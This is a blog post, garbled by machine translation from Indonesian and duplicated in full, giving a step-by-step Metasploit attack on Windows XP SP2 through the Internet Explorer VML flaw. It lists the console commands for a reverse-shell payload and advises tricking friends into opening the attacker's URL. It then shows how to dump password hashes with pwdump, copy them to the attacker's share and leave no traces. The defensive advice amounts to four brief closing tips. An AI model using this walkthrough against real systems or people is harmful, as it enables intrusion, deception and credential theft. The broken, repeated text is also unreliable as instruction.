Hack Windows XP SP2
* Fyuhh ... finally sempet also nyelesain this paper . Yosh .. here is the prof of concept! .
Disclaimer : This document was written in the interest of education . The author can not be held responsible for how the topics Discussed in this document are applied .
After finding out a bit and the basic concept ' standard ' hack discussed the first section and know little about the exploit material on the second part , we practice now immediately wrote . Here I purposely use VMWare to do the simulation , because not everyone can practice it in a network . By using VMWare , we can simulate a simple network as if there is a network of our own computer and other computers . For those who can not use VMWare , try searching the internet ! Operating system I use is Windows XP SP2 .
Tools I use is the Metasploit Framework to exploit sertaPwDump6 to take the hash file of the target computer . What is Metasploit Framework ?
The Metasploit Framework is a complete environment for writing , testing , and using exploit code . This environment provides a solid platform for penetrationtesting , shellcode development , and vulnerability research .
For more about the use of Metasploit , you can membacadokomentasi which are also included in the installation . To install metasploit version 2.7 , user needs administrator . Previously I tried to install with a ' limited user ' but once installed can not be executed . Metasploit installation is actually just extract the files only. So you can install it without having to get the user admin and put it anywhere without having to install in the Program Files folder . But after a little dioprek , it does not have to admin that can run . Rather complicated and too lazy to write here anyway , because when trying the latest version , which is version 3 Beta 3 , we can run it without having to install the admin user . So wrote ko bother ! Moreover version 3 ( skarang msh beta ) cooler and more expensive . But unfortunately for msfweb ( web version ) can not be implemented fully .
Ok .. Now I assume you have read the userguide metasploit ( ah. . least my assumption is wrong; p ) . Let more plasticity cool and understand the details , I explained that using the console metasplooit ( mfsconsole ) alone . Metasploit using cygwin to run it , because metasploit made menggunakanPerl . Now let's practice !
Pertama2 run ' mfsconsole ' !
To learn what command is in msfconsole use the command ' help' .
Because who wants to be a target computer is Windows XP SP2 , then used an exploit that affect XP SP2 is by exploiting vulnerabilities in Internet Explorer VML Fill Method Code Execution .
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing VML code ( VGX.dll ) . This module has been tested on Windows 2000 SP4 , Windows XP SP0 , and Windows XP SP2 .
To see the info from this exploit use the command :
msf > information ie_vml_rectfill
Exploit ie_vml_rectfill exploiting vulnerabilities in Internet Explorer . Therefore , this exploit will effect if the target computer is running IE and its direct url to the attacker's computer . For that , we have to use a bit of ' social engineering ' , as if in a boarding / lab / office we say to our friends that we 're trying to create a new web application , then ask viewed using IE to IP address ( or computer name ) us . Misalkanhttp :/ / 192.168.186.1 . Usually after this exploit is executed and the target computer is connected , then IE will crash . Take a few moments to let the exploit ' works ' . After a few moments just say " wah .. no error ya . Ok .. I try betulin first ... thank ya " . IE closes its new use Task Manager ( TM use though , IE msh hard to kill , do not forget to me - ' end process' 's' dumpred.exe ' as well , but after the exploit to work ) .
To use the exploit perintah2 use the following on the console :
msf > use_ie_vml_rectfill
msf > set payload win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
The result will look like the following picture :
In the above example , the target computer's IP ( RHOST ) is 192 168 186 128 , while the attacker's computer ( LHOST ) is 192.168.186.1 . Then the ' payload ' is used is ' win32_reverse ' and its HTTP PORT is 80 ( default http port ) . After running the command ' exploit ' , then we ask the target computer to run IE and its direct url to our computer . This process will take some time , even sometimes does not work . So try aja continue
If you succeed , then you will get a ' cmd.exe ' from the target computer .
Password Crack da !
Well , after our ' master ' target computer , take a look skalian wrote his password . The trick is similar to my previous article on Password Hack Win XP SP2 , but this remote because we have to ' providing' program required that pwdump . In order for this method successfully , I assume on the target computer users who are logged in have admin access . Klo targets computer users who use IE are exploited its user only ' normal ' , pwdump will not work !
First we share our first pwdump of computers with full access to upload the results so we can dump the target computer password , but with the suffix ' $ ' let me not look dikomputer general . Suppose the share folder name pwdump $ . Then from the console that successfully hacked , take pwdump the Map Network Drive from your computer with ' net use ' . Examples of commands are used :
After that copy pwdump to the target computer in a temporary folder ' temp ' . After pwdump successfully copied to the target computer , run the command pwdump
C : \ temp \ pwdump - o pass.txt 127.0.0.1
Klo successful will appear in the following figure .
Then copy the files to your computer pass.txt
C : \ temp \ pass.txt copy z :
And lastly , do not leave traces that we 've stopped over there .
Well , already get it right hash file . Living in crack aja deh .... ( see previous article for crack the password ) .
Actually there are many who can dioprek from metasploit . There are many exploits in metasploit , payload , meterpreter , etc. very ' fun ' for dioprek . To learn metasploit , its website there is a fairly good documentation .
Happy Hacking .....
Some suggestions for our windows remain secure against exploits above .
1 . Do not use Internet Explorer . Use Mozilla Firefox or Opera ! .
2 . Patch your Windows .
3 . Use antivirus with latest update
4 . Hati2 against your own friends .. beware ! ! p
Reference : http://www.savehacker.blogspotcom
* Fyuhh ... finally sempet also nyelesain this paper . Yosh .. here is the prof of concept! .
Disclaimer : This document was written in the interest of education . The author can not be held responsible for how the topics Discussed in this document are applied .
After finding out a bit and the basic concept ' standard ' hack discussed the first section and know little about the exploit material on the second part , we practice now immediately wrote . Here I purposely use VMWare to do the simulation , because not everyone can practice it in a network . By using VMWare , we can simulate a simple network as if there is a network of our own computer and other computers . For those who can not use VMWare , try searching the internet ! Operating system I use is Windows XP SP2 .
Tools I use is the Metasploit Framework to exploit sertaPwDump6 to take the hash file of the target computer . What is Metasploit Framework ?
The Metasploit Framework is a complete environment for writing , testing , and using exploit code . This environment provides a solid platform for penetrationtesting , shellcode development , and vulnerability research .
For more about the use of Metasploit , you can membacadokomentasi which are also included in the installation . To install metasploit version 2.7 , user needs administrator . Previously I tried to install with a ' limited user ' but once installed can not be executed . Metasploit installation is actually just extract the files only. So you can install it without having to get the user admin and put it anywhere without having to install in the Program Files folder . But after a little dioprek , it does not have to admin that can run . Rather complicated and too lazy to write here anyway , because when trying the latest version , which is version 3 Beta 3 , we can run it without having to install the admin user . So wrote ko bother ! Moreover version 3 ( skarang msh beta ) cooler and more expensive . But unfortunately for msfweb ( web version ) can not be implemented fully .
Ok .. Now I assume you have read the userguide metasploit ( ah. . least my assumption is wrong; p ) . Let more plasticity cool and understand the details , I explained that using the console metasplooit ( mfsconsole ) alone . Metasploit using cygwin to run it , because metasploit made menggunakanPerl . Now let's practice !
Pertama2 run ' mfsconsole ' !
To learn what command is in msfconsole use the command ' help' .
Because who wants to be a target computer is Windows XP SP2 , then used an exploit that affect XP SP2 is by exploiting vulnerabilities in Internet Explorer VML Fill Method Code Execution .
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing VML code ( VGX.dll ) . This module has been tested on Windows 2000 SP4 , Windows XP SP0 , and Windows XP SP2 .
To see the info from this exploit use the command :
msf > information ie_vml_rectfill
Exploit ie_vml_rectfill exploiting vulnerabilities in Internet Explorer . Therefore , this exploit will effect if the target computer is running IE and its direct url to the attacker's computer . For that , we have to use a bit of ' social engineering ' , as if in a boarding / lab / office we say to our friends that we 're trying to create a new web application , then ask viewed using IE to IP address ( or computer name ) us . Misalkanhttp :/ / 192.168.186.1 . Usually after this exploit is executed and the target computer is connected , then IE will crash . Take a few moments to let the exploit ' works ' . After a few moments just say " wah .. no error ya . Ok .. I try betulin first ... thank ya " . IE closes its new use Task Manager ( TM use though , IE msh hard to kill , do not forget to me - ' end process' 's' dumpred.exe ' as well , but after the exploit to work ) .
To use the exploit perintah2 use the following on the console :
msf > use_ie_vml_rectfill
msf > set payload win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
The result will look like the following picture :
In the above example , the target computer's IP ( RHOST ) is 192 168 186 128 , while the attacker's computer ( LHOST ) is 192.168.186.1 . Then the ' payload ' is used is ' win32_reverse ' and its HTTP PORT is 80 ( default http port ) . After running the command ' exploit ' , then we ask the target computer to run IE and its direct url to our computer . This process will take some time , even sometimes does not work . So try aja continue
If you succeed , then you will get a ' cmd.exe ' from the target computer .
Password Crack da !
Well , after our ' master ' target computer , take a look skalian wrote his password . The trick is similar to my previous article on Password Hack Win XP SP2 , but this remote because we have to ' providing' program required that pwdump . In order for this method successfully , I assume on the target computer users who are logged in have admin access . Klo targets computer users who use IE are exploited its user only ' normal ' , pwdump will not work !
First we share our first pwdump of computers with full access to upload the results so we can dump the target computer password , but with the suffix ' $ ' let me not look dikomputer general . Suppose the share folder name pwdump $ . Then from the console that successfully hacked , take pwdump the Map Network Drive from your computer with ' net use ' . Examples of commands are used :
After that copy pwdump to the target computer in a temporary folder ' temp ' . After pwdump successfully copied to the target computer , run the command pwdump
C : \ temp \ pwdump - o pass.txt 127.0.0.1
Klo successful will appear in the following figure .
Then copy the files to your computer pass.txt
C : \ temp \ pass.txt copy z :
And lastly , do not leave traces that we 've stopped over there .
Well , already get it right hash file . Living in crack aja deh .... ( see previous article for crack the password ) .
Actually there are many who can dioprek from metasploit . There are many exploits in metasploit , payload , meterpreter , etc. very ' fun ' for dioprek . To learn metasploit , its website there is a fairly good documentation .
Happy Hacking .....
Some suggestions for our windows remain secure against exploits above .
1 . Do not use Internet Explorer . Use Mozilla Firefox or Opera ! .
2 . Patch your Windows .
3 . Use antivirus with latest update
4 . Hati2 against your own friends .. beware ! ! p
Reference : http://www.savehacker.blogspotcom
is good.,.,
ReplyDelete